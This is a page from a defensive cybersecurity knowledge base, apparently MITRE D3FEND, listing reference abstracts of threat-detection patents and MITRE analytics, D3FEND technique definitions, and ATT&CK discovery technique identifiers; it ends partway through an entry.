  • "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "This patent describes detecting malicious processes on a host. Agents are deployed on hosts that monitor all initiated processes and determine whether a process was initiated at boot or initiated by another process. If not initiated at boot or by another process, the process is identified as suspicious and an alert is triggered."

kb-organization

  • "Palo Alto Networks IncCyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for causality identification and attributions determination of processes in a network - Palo Alto Networks IncCyber Secdo Ltd"

kb-reference-of

kb-reference-title

  • "System and methods thereof for causality identification and attributions determination of processes in a network"

Usage (5)

kb-abstract

  • "A system is used for detection of advanced persistent and non-persistent threats in a computerized environment. The system is connected to a plurality of user devices coupled to an enterprise's network. The system receives via an interface an electronic notification of at least one event in the operating system of the computer. The system then analyzes the at least one event. The system then generates a causality chain for the at least one event respective of the analysis. The causality chain comprises all the threads that attributed to the at least one event in a chronological order. The system then identifies a main thread that started the causality chain that led to the at least one event. Then, the system determines whether the main thread is associated with malicious software. Upon determination that the main thread is associated with malicious software, the causality chain is marked as infected."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "The patent describes detecting malicious events on a host. For each new event (e.x. new file request received from a user device, a change in an existing file in a container) a causality chain is developed for all threads associated with the event. The causality chain identifies the thread that started the process of the event (main thread). If a thread in the causality chain has no parent, i.e. no main thread associated with it, the process is identified as malicious."

kb-organization

  • "Palo Alto Networks IncCyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for detection of persistent threats in a computerized environment background - Palo Alto Networks IncCyber Secdo Ltd"

kb-reference-title

  • "System and methods thereof for detection of persistent threats in a computerized environment background"

Usage (5)

kb-abstract

  • "A computerized method for identification of suspicious processes executing on an end-point device communicatively connected to network, the network communicatively connected to a server, the method comprising receiving, by the server, a record of at least one process, initiated by and executing on by the end-point device. One or more parameters associated with the at least one process are identified. A first time pointer is identified corresponding to the identified one or more parameters, a first time pointer. A second time pointer at which a user associated with the end-point device initiated a user dependent process is identified. Whether the second time pointer occurred before the first time pointer is identified. It is determined whether the at least one process was initiated by the user based on identification of user dependent processes and corresponding attribution. An action is performed based on the above determination."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "The patent describes detecting malicious processes by identifying the order of process initiation. The start of a user initiated process (user query, opening an application, etc.) is compared with the start of processes initiated by the device (ex. during boot). In addition, a determination is made on whether processes are not initiated by a user by examining process parameters such as type of process, its creator, source, etc. If it is determined that a user initiated process was started before a process initiated by the device and a process was not initiated by the user, the process is marked as suspicious."

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and methods thereof for identification of suspicious system processes - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and methods thereof for identification of suspicious system processes"

Usage (5)

kb-abstract

  • "A computerized method for logical identification of malicious threats across a plurality of end-point devices (EPD) communicatively connected by a network, comprising collecting over the network an identifier associated with each file of a plurality of files, wherein each file of the plurality of files is installed on at least one of the plurality of EPDs and wherein the identifier is the same for each like file of the plurality of file. Information associated with an identified subset of files is collected, wherein the information indicates at least a time at which the at least one file was installed on one or more of the plurality of EPDs and the way the at least one file spread within the network. The collected information is analyzed according to a set of predetermined computerized investigation rules. The analysis is used to determine whether at least a file of the identified subset files is a suspicious file."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • "This patent describes detecting suspicious files using file metadata such as the prevalence of the file deployed on the network, file installation times, and how the file was spread within the network. The combination of these factors are used to determine a risk score of the file and if below a threshold, sends an alert."

kb-organization

  • "Palo Alto Networks IncCyber Secdo Ltd"

rdfs:label

  • "Reference - System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network - Palo Alto Networks IncCyber Secdo Ltd"

kb-reference-of

kb-reference-title

  • "System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network"

Usage (5)

kb-abstract

  • "A computerized method for preventing ransomware from encrypting data elements stored in a memory of a computer-based system, the method comprising identifying at least one identifier for a data element, wherein the at least one identifier indicates at least a position of the data element within the memory. An optimal number of virtual traps is determined for the data element corresponding to the at least one identifier. An optimal position for each of the virtual traps is determined corresponding to the at least one identifier. The virtual traps are send to the determined optimal position within the memory."

kb-author

  • "Gil BARAK"

kb-mitre-analysis

  • ""

kb-organization

  • "Palo Alto Networks Inc"

rdfs:label

  • "Reference - System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system - Palo Alto Networks Inc"

kb-reference-of

kb-reference-title

  • "System and methods thereof for preventing ransomware from encrypting data elements stored in a memory of a computer-based system"

Usage (5)

kb-abstract

  • "Disclosed is an improved approach to implement a system and method for detecting insider threats, where models are constructed that is capable of defining what constitutes the normal behavior for any given hosts and quickly find anomalous behaviors that could constitute a potential threat to an organization. The disclosed approach provides a way to identify abnormal data transfers within and external to an organization without the need for individual monitoring software on each host, by leveraging metadata that describe the data exchange patterns observed in the network."

kb-author

  • "Nicolas BEAUCHESNE; David Lopes Pegna"

kb-mitre-analysis

  • "Determination of anomalous data transfers is performed over a given time period. For example, a check of a pull vs. push data ratio can be established over a specific time period, e.g., over a three-hour period, over a one day period, over a one week period, etc.

    The system can also establish a baseline behavior for data exchange for each host in terms of pull vs. push data ratio for each resource contacted by the host.

    Network packet capture data is collected and metadata is extracted. Aggregate data push/pull information from the metadata is then analyzed for a given host versus specific client to server relationships. This technique can potentially catch lateral data transfers, and may have filtering on alerting logic to only raise alarms when external hosts receive large data transfers."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for detecting threats using scenario-based tracking of internal and external network traffic - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for detecting threats using scenario-based tracking of internal and external network traffic"

Usage (5)

kb-abstract

  • "A method and system for identifying insider threats within an organization is provided. The approach constructs an internal connectivity graph to identify communities of hosts/users, and checks for abnormal behavior relative to past behaviors."

kb-author

  • "David Lopes Pegna; Himanshu Mhatre; Oliver Brdiczka"

kb-mitre-analysis

  • "This patent describes techniques for detecting insider attacks. Network packet capture data is collected and stored for processing. Metadata is extracted for each communication session on the organization's network and includes information on source and destination host destination port, number of connection attempts, size of data exchanged, duration and time of the communication. The metadata is used to build a connectivity graph of the network and identify groups of similar hosts that exhibit similar behavior. For each group of similar behavior identified, a baseline behavior pattern profile is developed. Network activity for a host within a group that deviates over a threshold from the baseline behavior patterns is identified as suspicious and an alert is generated."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for implementing threat detection using daily network traffic community outliers - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for implementing threat detection using daily network traffic community outliers"

Usage (5)

kb-abstract

  • "Disclosed is an approach to detect insider threats, by tracking unusual access activity for a specific user or computer with regard to accessing key assets over time. In this way, malicious activity and the different preparation phases of attacks can be identified."

kb-author

  • "Himanshu Mhatre; David Lopes Pegna; Oliver Brdiczka"

kb-mitre-analysis

  • "The patent describes an insider threat detection system that analyzes packets sent within a network to identify and isolate malicious behavior. Current network traffic is collected and developed into a baseline that establishes the amount of data sent and received between a specific asset and a host. Current data transfer values are then compared with the baseline to identify anomalies."

kb-organization

  • "VECTRA NETWORKS Inc"

rdfs:label

  • "Reference - System for implementing threat detection using threat and risk assessment of asset-actor interactions - VECTRA NETWORKS Inc"

kb-reference-of

kb-reference-title

  • "System for implementing threat detection using threat and risk assessment of asset-actor interactions"

Usage (5)

kb-abstract

  • "Techniques for detecting and/or handling target attacks in an enterprise's email channel are provided. The techniques include receiving aspects of an incoming email message addressed to a first email account holder, selecting a recipient interaction profile and/or a sender profile from a plurality of predetermined profiles stored in a memory based upon the received properties, determining a message trust rating associated with the incoming email message based upon the incoming email message and the selected recipient interaction profile and/or the sender profile; and generating an alert identifying the incoming email message as including a security risk based upon the determined message trust rating. The recipient interaction profile includes information associating the first email account holder and a plurality of email senders from whom email messages have previously been received for the first email account holder, and the sender profile includes information associating a sender of the incoming email message with characteristics determined from a plurality of email messages previously received from the sender."

kb-author

  • "Manoj Kumar Srivastava"

kb-mitre-analysis

  • "The patent describes using sender trust rating and sender MTA trust rating as an indicator of level of email security risk.

    ### Sender Reputation explanation
    This patent includes Sender Reputation because it describes sender trust rating being used as an indicator of the level of security risk and/or trust level associated with an email sender. The sender trust rating may be determined based on one or more of:

    * length of time sender has known the enterprise
    * number of recipients in the enterprise the sender interacts with
    * sender vs. enterprise originated message ratio
    * sender messages open vs. not-open ratio
    * number of emails received from this sender
    * number of emails replied for this sender
    * number of emails from this sender not opened
    * number of emails from this sender not opened that contain an attachment
    * number of emails from this sender not opened that contain a URL
    * number of emails sent to this sender
    * number of email replies received from this sender

    Based on the trust rating an alert is generated identifying the incoming email message as a security risk.

    ### Sender MTA Reputation explanation
    This patent includes Sender MTA Reputation because it describes sender MTA trust rating as an indicator of the level of security risk and/or trust level associated with a sender MTA. The trust rating may be determined based on one or more of:

    * length of time MTA has interacted with the enterprise
    * number of sender domains sending emails from the MTA
    * number of recipients in the enterprise the MTA sends emails to
    * number of emails received from this MTA
    * number of email replies received from this MTA

    Based on the trust rating an alert is generated identifying the incoming email message as a security risk."

kb-organization

  • "Graphus Inc"

rdfs:label

  • "Reference - Systems and methods for detecting and/or handling targeted attacks in the email channel - Graphus Inc"

kb-reference-of

kb-reference-title

  • "Systems and methods for detecting and/or handling targeted attacks in the email channel"

Usage (5)

kb-abstract

  • "The disclosed computer-implemented method for detecting credential theft may include (i) monitoring a secured computing system's credential store that may include at least one sensitive credential that may be used to facilitate authentication of a user that is attempting to access the secured computing system, (ii) gathering, while monitoring the credential store, primary evidence of an attempted theft of the sensitive credential from the credential store, (iii) gathering corroborating evidence of the attempted theft of the sensitive credential, and (iv) performing a security action in response to gathering the primary evidence and the corroborating evidence of the attempted theft. The primary evidence of the attempted theft of the sensitive credential may include evidence of any suspicious access of the sensitive credential from the credential store that occurs outside of a procedure of authenticating the user. Various other methods, systems, and computer-readable media are also disclosed."

kb-author

  • "Adam Glick; Brian Schlatter; Feng Li; Akshata Krishnamoorthy Rao"

kb-mitre-analysis

  • ""

kb-organization

  • "Symantec Corp"

rdfs:label

  • "Reference - Systems and methods for detecting credential theft - Symantec Corp"

kb-reference-of

kb-reference-title

  • "Systems and methods for detecting credential theft"

Usage (5)

rdfs:label

  • "Reference - TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"

kb-reference-title

  • "TCG Trusted Attestation Protocol Use Cases for TPM Families 1.2 and 2.0 and DICE"

Usage (5)

kb-abstract

  • "System and method is disclosed for protecting client software running on a client computer from tampering using a secure server. Prior to or independent of executing the client software, the system integrates self-protection into the client software; removes functions from the client software for execution on the server; develops client software self-protection updates; and periodically distributes the updates. During execution of the client software, the system receives an initial request from the client computer for execution of the removed function; verifies the initial request; and cooperates with the client computer in execution of the client software if verification is successful. If verification is unsuccessful, the system can attempt to update the client software on the client computer; and require a new initial request. Client software can be updated on occurrence of a triggering event. Communications can be encrypted, and the encryption updated. Authenticating checksums can be used for verification."

kb-author

  • "Kevin Dale Morgan"

kb-mitre-analysis

  • ""

kb-organization

  • "ARXAN TECHNOLOGIES Inc"

rdfs:label

  • "Reference - Tamper proof mutating software - ARXAN TECHNOLOGIES Inc"

kb-reference-of

kb-reference-title

  • "Tamper proof mutating software"

Usage (5)

kb-author

  • "National Counterintelligence and Security Center"

rdfs:label

  • "Reference - Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"

kb-reference-of

kb-reference-title

  • "Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"

Usage (5)

kb-abstract

  • "Infinite DNS decoy trap resource to catch threats scanning for network resources to attack.

    In various embodiments, a name server transmits a canonical name as resolution to another canonical name. In operation, when a resource name is requested for resolution, a determination is made that the resource name corresponds to a trap resource name. A first canonical name is transmitted as resolution to the trap resource name. The first canonical name is requested for resolution, and a second canonical name is transmitted as resolution. By providing trap canonical names as resolutions to trap canonical names, unauthorized software making the resolution requests is kept occupied with requesting resolution of canonical name after canonical name, impeding the ability of the unauthorized software from traversing a network."

kb-author

  • "Ben McCarty, James Graham"

kb-mitre-analysis

  • "MITRE Analysis was not found."

kb-organization

  • "Verisign Inc"

rdfs:label

  • "Reference - Techniques for impeding and detecting network threats - Verisign Inc"

kb-reference-of

kb-reference-title

  • "Techniques for impeding and detecting network threats"

Usage (5)

kb-abstract

  • "Tenable Nessus® Network Monitor (NNM), a passive monitoring sensor, continuously discovers active assets on the network and assesses them for vulnerabilities. NNM is based on patented network discovery and vulnerability analysis technology that continuously monitors and profiles non-intrusively. It monitors IPv4, IPv6 and mixed network traffic at the packet layer to determine topology, services and vulnerabilities."

kb-organization

  • "Tenable"

rdfs:label

  • "Reference - Tenable Passive Network Monitoring"

kb-reference-of

kb-reference-title

  • "Tenable Passive Network Monitoring"

Usage (5)

kb-author

  • "Matt Weir, Sudhir Aggarwal, Michael Collins, Henry Stern"

rdfs:label

  • "Reference - Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"

kb-reference-of

kb-reference-title

  • "Testing Metrics for Password Creation Policies by Attacking Large Sets of Revealed Passwords"

Usage (5)

kb-abstract

  • "This disclosure describes, in part, techniques for detecting security exploits associated with return-oriented programming. The techniques include determining that a retrieved count is indicative of malicious activity, such as return oriented programming. The count may be retrieved from a processor performance counter of prediction mismatches, the prediction mismatches resulting from comparisons of a call stack of a computing device and of a shadow call stack maintained by a processor of the computing device. The techniques further include performing at least one security response action in response to determining that the count indicates malicious activity."

kb-author

  • "Georg WICHERSKI"

kb-mitre-analysis

  • "This patent describes a technique for detecting shellcode security exploits. A call stack of a computing device is compared with a shadow call stack maintained by a processor of the computing device since a return oriented program may only be able to control or spoof the call stack and not the shadow call stack. Mismatches between the two are counted and if the number of mismatches exceeds a certain threshold it is an indication of malicious activity and a security response action is performed."

kb-organization

  • "Crowdstrike Inc"

rdfs:label

  • "Reference - Threat detection for return oriented programming - Crowdstrike Inc"

kb-reference-of

kb-reference-title

  • "Threat detection for return oriented programming"

Usage (5)

kb-abstract

  • "Embodiments of the present disclosure provide for improved capabilities in the detection of malware, where malware threats are detected through the accumulated identification of threat characteristics for targeted computer objects. Methods and systems include dynamic threat detection providing a first database that correlates a plurality of threat characteristics to a threat, wherein a presence of the plurality of the threat characteristics confirms a presence of the threat; detecting a change event in a computer run-time process; testing the change event for a presence of one or more of the plurality of characteristics upon detection of the change event; storing a detection of one of the plurality of characteristics in a second database that accumulates detected characteristics for the computer run-time process; and identifying the threat when each one of the plurality of characteristics appears in the second database."

kb-author

  • "Clifford Penton; Irene Michlin"

kb-mitre-analysis

  • ""

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Threat detection through the accumulated detection of threat characteristics - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Threat detection through the accumulated detection of threat characteristics"

Usage (5)

kb-organization

  • "IBM"

rdfs:label

  • "Reference - Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"

kb-reference-of

kb-reference-title

  • "Tivoli Application Dependency Discovery Manager 7.3.0 - Dependencies between resources"

Usage (5)

kb-article

  • "## Document Abstract
    This specification defines the Trusted Platform Module (TPM) a device that enables trust in computing platforms in general. It is broken into parts to make the role of each part clear. All parts are required in order to constitute a complete standard. For a complete definition of all requirements necessary to build a TPM, the designer will need to use the appropriate platform-specific specification to understand all of the requirements for a TPM in a specific application or make appropriate choices as an implementer. Those wishing to create a TPM need to be aware that this specification does not provide a complete picture of the options and commands necessary to implement a TPM. To implement a TPM the designer needs to refer to the relevant platform-specific specification to understand the options and settings required for a TPM in a specific type of platform or make appropriate choices as an implementer."

rdfs:label

  • "Reference - Trusted Attestation Protocol Use Cases"

kb-reference-title

  • "Trusted Attestation Protocol Use Cases"

Usage (5)

kb-abstract

  • "A method to identify a child process to a parent process in an operating system includes obtaining a token and login identifier from the operating system. The parent process creates a remote procedure call communications endpoint to communicate with the child process. Thereafter, a child process is spawned by the parent process. A child-initiated request to communicate with the parent process is then received by the parent process. In order to verify the identity of the child-initiated request, the parent process impersonates the child process and receives as identifier that identifies the requestor child process. The requestor process identifier and the spawned child identifier are compared. Based on the comparison, the parent process responds to the child-initiated request. In another embodiment, process identifiers are used by the parent process to verify the identity of a child process the requests communication with the parent process."

kb-author

  • "Kedarnath Atmaram Dubhashi, Jonathan D. Schwartz, Sambavi Muthukrishnan, Simon Skaria"

kb-mitre-analysis

  • "This patent describes a technique for detecting malicious processes that claim to be the child process of a legitimate parent process. During the spawning of a child process, a child process identifier is generated. The child process identifier is a unique identifier that can be used to identify a child process. The child process identifier is transmitted by the security system of the operating system to the parent process. The parent process keeps track of the child process identifier. When a new child-initiated communications request is received by the parent process, the parent process checks if the requesting child process identifier and the child process identifier that the parent process is tracking are the same. If the identifiers are not the same, the parent process refuses the request."

kb-organization

  • "Microsoft Technology Licensing LLC"

rdfs:label

  • "Reference - Trusted Communications With Child Processes - Microsoft Technology Licensing LLC"

kb-reference-title

  • "Trusted Communications With Child Processes"

Usage (5)

kb-abstract

  • "Bypassing user account control (UAC Bypass) is generally done by piggybacking on a system process that has auto-escalate privileges. This analytic looks to detect those cases as described by the open-source UACME tool."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2019-04-001: UAC Bypass - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2019-04-001: UAC Bypass"

Usage (5)

kb-abstract

  • "UAF is an OMG standard that assists in development of architectural descriptions in commercial industry firms, federal government agencies and defense organizations. UAF has a variety of use cases from Enterprise and Mission architecting, to System of Systems (SoS) and Cyber-physical Systems engineering, as well as being an enabler for Digital Transformation efforts and for Department of Defense Architecture Framework (DoDAF) and NATO Architecture Framework (NAF) modeling. Architectural Descriptions in UAF are aligned with ISO/IEC/IEEE 42010:2011, Systems and software engineering -- Architecture description."

kb-organization

  • "OMG"

rdfs:label

  • "Reference - Unified Architecture Framework (UAF)"

kb-reference-of

kb-reference-title

  • "Unified Architecture Framework (UAF)"

Usage (5)

kb-abstract

  • "In embodiments of the present invention, a framework for an extensible, file-based security system is described for determining an appropriate application, application environment, and/or access or security control measure based at least in part on a file's reputation. In response to the selection of a file, an application controller may be used to select a software application from two or more software applications to open the selected file, based at least in part on the selected file's reputation. If launched, a software application may be configured to open the file in an environment, such as a virtual machine, quarantined environment, and the like, that is appropriate for the file based at least in part on the reputation information. A software application may be a secure software application configured to manage secure files, or an insecure software application configured to manage insecure files. The selected file, and communications relating to the selected software application, may be managed according to the selected software application's secure or insecure configuration. Further, the selected software application may associate reputation information with all files that are modified and/or created by the selected software application, including at least in part, reputation information matching that of the selected file."

kb-author

  • "Andrew J. Thomas"

kb-mitre-analysis

  • "This patent describes received files being open in an environment such as a virtual machine or quarantined environment to associate file reputation information that determines if a file is a threat."

kb-organization

  • "Sophos Ltd"

rdfs:label

  • "Reference - Use of an application controller to monitor and control software file and application environments - Sophos Ltd"

kb-reference-of

kb-reference-title

  • "Use of an application controller to monitor and control software file and application environments"

Usage (5)

kb-abstract

  • "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. Alerting when a "Clear Event Log" is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-002: User Activity from Clearing Event Logs - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-002: User Activity from Clearing Event Logs"

Usage (5)

kb-abstract

  • "Spyware and malware remain a serious problem and Microsoft developed security services, Windows Defender and Windows Firewall, to combat this threat. In the event Windows Defender or Windows Firewall is turned off, administrators should correct the issue immediately to prevent the possibility of infection or further infection and investigate to determine if caused by crash or user manipulation."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2016-04-003: User Activity from Stopping Windows Defensive Services - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2016-04-003: User Activity from Stopping Windows Defensive Services"

Usage (5)

kb-abstract

  • "Most users use only one or two machines during the normal course of business. User accounts that log in to multiple machines, especially over a short period of time, may be compromised. Remote logins among multiple machines may be an indicator of Lateral Movement.

    Certain users will likely appear as being logged into several machines and may need to be "whitelisted." Such users would include network admins or user names that are common to many hosts."

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-02-012: User Logged in to Multiple Hosts - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-02-012: User Logged in to Multiple Hosts"

Usage (5)

kb-abstract

  • "Monitoring logon and logoff events for hosts on the network is very important for situational awareness. This information can be used as an indicator of unusual activity as well as to corroborate activity seen elsewhere.

    Could be applied to a number of different types of monitoring depending on what information is desired. Some use cases include monitoring for all remote connections and building login timelines for users. Logon events are Windows Event Code 4624 for Windows Vista and above, 518 for pre-Vista. Logoff events are 4634 for Windows Vista and above, 538 for pre-Vista."

kb-author

  • "MITRE"

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2013-10-001: User Login Activity Monitoring - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2013-10-001: User Login Activity Monitoring"

Usage (5)

kb-abstract

  • "Spanning Tree Protocol (STP) data is obtained via network switch (SNMP) queries to enhance identification of switch-to-switch links in Layer-2 mapping. In particular, by analyzing the STP data, ambiguity in determining switch uplink ports may be reduced. Specifically, the STP data can be used in conjunction with other topography data to provide Layer-2 connectivity for nodes on a network topology. Layer-2 address mapping tables are collected from a topology mapping, and STP data is collected, along with address translation tables (ARP) tables. Using this information, switches are identified using Layer-2 address tables. The STP data can be correlated by comparing data in switches, identifying switch ports directly connected to other switch ports, and eliminating direct switch-to-switch port connections from consideration for further Layer-2 node mappings."

kb-author

  • "Michael Jon Swan"

kb-organization

  • "SolarWinds Worldwide LLC"

rdfs:label

  • "Reference - Using spanning tree protocol (STP) to enhance layer-2 topology maps"

kb-reference-of

kb-reference-title

  • "Using spanning tree protocol (STP) to enhance layer-2 topology maps"

Usage (5)

kb-abstract

  • "Systems, apparatuses, and methods for implementing virtualized process isolation are disclosed. A system includes a kernel and multiple guest VMs executing on the system's processing hardware. Each guest VM includes a vShim layer for managing kernel accesses to user space and guest accesses to kernel space. The vShim layer also maintains a separate set of page tables from the kernel page tables. In one embodiment, data in the user space is encrypted and the kernel goes through the vShim layer to access user space data. When the kernel attempts to access a user space address, the kernel exits and the vShim layer is launched to process the request. If the kernel has permission to access the address, the vShim layer copies the data to a region in kernel space and then returns execution to the kernel."

kb-author

  • "David A. Kaplan"

kb-mitre-analysis

  • ""

kb-organization

  • "Advanced Micro Devices Inc"

rdfs:label

  • "Reference - Virtualized process isolation - Advanced Micro Devices Inc"

kb-reference-of

kb-reference-title

  • "Virtualized process isolation"

Usage (5)

kb-organization

  • "Distributed Management Task Force (DMTF)"

rdfs:label

  • "Reference - Web-Based Enterprise Management"

kb-reference-of

kb-reference-title

  • "Web-Based Enterprise Management"

Usage (5)

kb-abstract

  • "What is NX/XD feature ?
    How to check whether NX/XD is enabled ?
    How to enable or disable NX/XD?

    NX/XD is a hardware cpu feature which is provided in almost all the hardware. Some BIOS has advanced option of enabling or disabling it.
    NX stands for No eXecute and XD stands for eXecute Disable. Both are same and is a technology used in processors to prevent execution of certain types of code."

kb-author

  • "Red Hat"

kb-mitre-analysis

  • ""

kb-organization

  • "Red Hat"

rdfs:label

  • "Reference - What is NX/XD feature?"

kb-reference-of

kb-reference-title

  • "What is NX/XD feature?"

Usage (5)

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Windows Management Infrastructure (MI)"

kb-reference-of

kb-reference-title

  • "Windows Management Infrastructure"

Usage (5)

kb-organization

  • "Microsoft"

rdfs:label

  • "Reference - Windows Management Instrumentation (WMI)"

kb-reference-of

kb-reference-title

  • "Windows Management Instrumentation"

Usage (5)

kb-abstract

  • ""

kb-author

  • "MITRE"

kb-mitre-analysis

  • ""

kb-organization

  • "MITRE"

rdfs:label

  • "Reference - CAR-2014-11-006: Windows Remote Management (WinRM) - MITRE"

kb-reference-of

kb-reference-title

  • "CAR-2014-11-006: Windows Remote Management (WinRM)"

Usage (5)

kb-abstract

  • "Keystroke dynamics or typing dynamics refers to the automated method of identifying or confirming the identity of an individual based on the manner and the rhythm of typing on a keyboard. Keystroke dynamics is a behavioral biometric, this means that the biometric factor is 'something you do'.

    Already during the second world war a technique known as The Fist of the Sender was used by military intelligence to distinguish based on the rhythm whether a morse code message was send by ally or enemy. These days each household has at least one computer keyboard, making keystroke dynamics the easiest biometric solution to implement in terms of hardware.

    With keystroke dynamics the biometric template used to identify an individual is based on the typing pattern, the rhythm and the speed of typing on a keyboard. The raw measurements used for keystroke dynamics are dwell time and flight time."

kb-author

  • "Biometric Solutions"

kb-organization

  • "Biometric Solutions"

rdfs:label

  • "Reference - http://www.biometric-solutions.com/keystroke-dynamics.html - biometric-solutions.com"

kb-reference-of

kb-reference-title

  • "Keystroke Dynamics"

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

Usage (5)

definition

  • "A service dependency indicates a service has an activity, agent, or another service which relies on it in order to be functional."

rdfs:label

  • "Service Dependency"

Usage (5)

definition

  • "Service dependency mapping determines the services on which each given service relies."

kb-article

  • "## How it works
    The organization collects and models architectural information about the services and consumers of services and maps the dependencies between the services.

    ## Considerations
    * Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.
    * Service dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.
    * Service dependencies in cloud or microservice architectures may be discovered using distributed tracing capabilities"

rdfs:label

  • "Service Dependency Mapping"

synonym

  • "Distributed Tracing"

d3fend-id

  • "D3-SVCDM"

kb-reference

maps

Usage (5)

definition

  • "Software inventorying identifies and records the software items in the organization's architecture."

kb-article

  • "## How it works
    Administrators collect information on software items in their architecture using a variety of administrative and management tools that query network nodes for information. In limited cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through network enumeration methods to determine services responding on network nodes.

    ## Considerations
    * Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.
    * An adversary conducting network enumeration may engage in activities that parallel normal software inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools.

    ## Examples

    Application-layer discovery:

    * Simple Network Management Protocol (SNMP) collects MIB information
    * Web-based Enterprise Management (WBEM) collects CIM information
    * Windows Management Instrumentation (WMI)
    * Windows Management Infrastructure (MI)"

rdfs:label

  • "Software Inventory"

synonym

  • "Software Discovery"
  • "Software Inventorying"

d3fend-id

  • "D3-SWI"

inventories

kb-reference

Usage (5)

definition

  • "A system dependency indicates a system has an activity, agent, or another system which relies on it in order to be functional."

rdfs:label

  • "System Dependency"

rdfs:seeAlso

Usage (5)

definition

  • "System dependency mapping identifies and models the dependencies of system components on each other to carry out their function."

kb-article

  • "## How it works
    The organization collects and models architectural information about the software, hardware, and products and maps the dependencies between systems, including each system's internal components and dependencies.

    ## Considerations
    * Data exchanges identified in the network mapping efforts usually indicate such dependencies, but may not be part of the intended design.
    * Architectural design artifacts and SMEs may need to be consulted to determine if dependencies are intended or otherwise essential.
    * System depedency mapping can identify internal dependencies of standard and pre-built systems that should be incorporated into a complete system dependency model.
    * System dependencies for critical systems--those supporting critical organizational activities--should be prioritized for supply chain risk analysis.
    * System dependencies should identify the integral components of a given named system and their structure to form a system.
    * System dependencies with a given system may be fixed by a particular product's configuration, and leveraging external knowledge bases about dependencies available (e.g., from package managers) is essential."

rdfs:label

  • "System Dependency Mapping"

d3fend-id

  • "D3-SYSDM"

kb-reference

maps

Usage (5)

definition

  • "System mapping encompasses the techniques to identify the organization's systems, how they are configured and decomposed into subsystems and components, how they are dependent on one another, and where they are physically located."

rdfs:label

  • "System Mapping"

d3fend-id

  • "D3-SYSM"

display-order

  • 2

enables

Usage (5)

definition

  • "System vulnerability assessment relates all the vulnerabilities of a system's components in the context of their configuration and internal dependencies and can also include assessing risk emerging from the system's design as a whole, not just the sum of individual component vulnerabilities."

rdfs:label

  • "System Vulnerability Assessment"

d3fend-id

  • "D3-SYSVA"

evaluates

identifies

kb-reference

Usage (5)

attack-id

  • "T1007"

rdfs:label

  • "System Service Discovery"

may-invoke

Usage (5)

attack-id

  • "T1010"

rdfs:label

  • "Application Window Discovery"

may-invoke

Usage (5)

attack-id

  • "T1012"

rdfs:label

  • "Query Registry"

accesses

may-invoke

Usage (5)

attack-id

  • "T1016"

rdfs:label

  • "System Network Configuration Discovery"

may-execute

may-invoke

Usage (5)

attack-id

  • "T1018"

rdfs:label

  • "Remote System Discovery"

may-access

may-invoke

produces

Usage (5)

attack-id

  • "T1033"

rdfs:label

  • "System Owner/User Discovery"

may-access

may-invoke

Usage (5)

attack-id

  • "T1047"

rdfs:label

  • "Windows Management Instrumentation Execution"

may-create

may-invoke

Usage (5)

attack-id

  • "T1049"

rdfs:label

  • "System Network Connections Discovery"

may-invoke

Usage (5)

attack-id

  • "T1057"

rdfs:label

